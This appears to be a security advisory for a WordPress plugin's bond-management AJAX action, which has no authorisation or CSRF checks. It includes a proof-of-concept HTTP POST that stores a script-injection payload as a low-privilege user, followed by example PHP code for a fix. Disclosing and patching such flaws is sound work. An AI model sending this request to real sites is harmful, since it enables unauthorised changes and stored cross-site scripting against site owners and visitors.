The plugin has no authorisation or Cross-Site Request Forgery (CSRF) check in an AJAX action, allowing any authenticated user, such as a subscriber, to call it and add, delete or edit Bonds. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting (XSS) issues.
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

option=SBF_DB_code_manage_action&B_COMMAND=ADD&B_PARAM=10&B_PARAM2=<script>alert(/XSS/)</script>&B_PARAM3=1&submit=submit
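
The three missing controls (nonce check, capability check, sanitising on input and escaping on output) in a WordPress AJAX handler, as an added example that is not the plugin's code or its actual fix. Assumptions: the string SBF_DB_code_manage_action is used as the AJAX hook name, the 'edit' and 'delete' command values, the meaning given to each B_PARAM field, the manage_options capability, and every example_* name including the option used as a stand-in for the plugin's storage.

```php
<?php
// Added example, not the plugin's code. The hook name and B_* fields come from
// the request above; every example_* name, the nonce field, the capability,
// the 'edit'/'delete' command values and the option store are assumptions.
add_action( 'wp_ajax_SBF_DB_code_manage_action', 'example_sbf_manage_bonds' );

function example_sbf_manage_bonds() {
    // CSRF: the admin form must send wp_create_nonce( 'example_sbf_manage_bonds' )
    // in a 'nonce' field; check_ajax_referer() ends the request if it is invalid.
    check_ajax_referer( 'example_sbf_manage_bonds', 'nonce' );

    // Authorisation: subscribers are logged in but lack this capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Allow-list the command instead of passing it through.
    $command = isset( $_POST['B_COMMAND'] )
        ? strtolower( sanitize_text_field( wp_unslash( $_POST['B_COMMAND'] ) ) )
        : '';
    if ( ! in_array( $command, array( 'add', 'edit', 'delete' ), true ) ) {
        wp_send_json_error( 'unknown command', 400 );
    }

    // Sanitise on input: numeric fields become integers, text loses its markup.
    $id    = isset( $_POST['B_PARAM'] ) ? absint( $_POST['B_PARAM'] ) : 0;
    $label = isset( $_POST['B_PARAM2'] )
        ? sanitize_text_field( wp_unslash( $_POST['B_PARAM2'] ) )
        : '';
    $flag  = isset( $_POST['B_PARAM3'] ) ? absint( $_POST['B_PARAM3'] ) : 0;

    $bonds = (array) get_option( 'example_sbf_bonds', array() );
    if ( 'delete' === $command ) {
        unset( $bonds[ $id ] );
    } else {
        $bonds[ $id ] = array( 'label' => $label, 'flag' => $flag );
    }
    update_option( 'example_sbf_bonds', $bonds );
    wp_send_json_success( array( 'id' => $id ) );
}

// Escape on output as well, so a value stored before the fix cannot execute.
function example_sbf_render_bonds() {
    echo '<ul>';
    foreach ( (array) get_option( 'example_sbf_bonds', array() ) as $id => $bond ) {
        printf( '<li>%d: %s</li>', (int) $id, esc_html( $bond['label'] ) );
    }
    echo '</ul>';
}
```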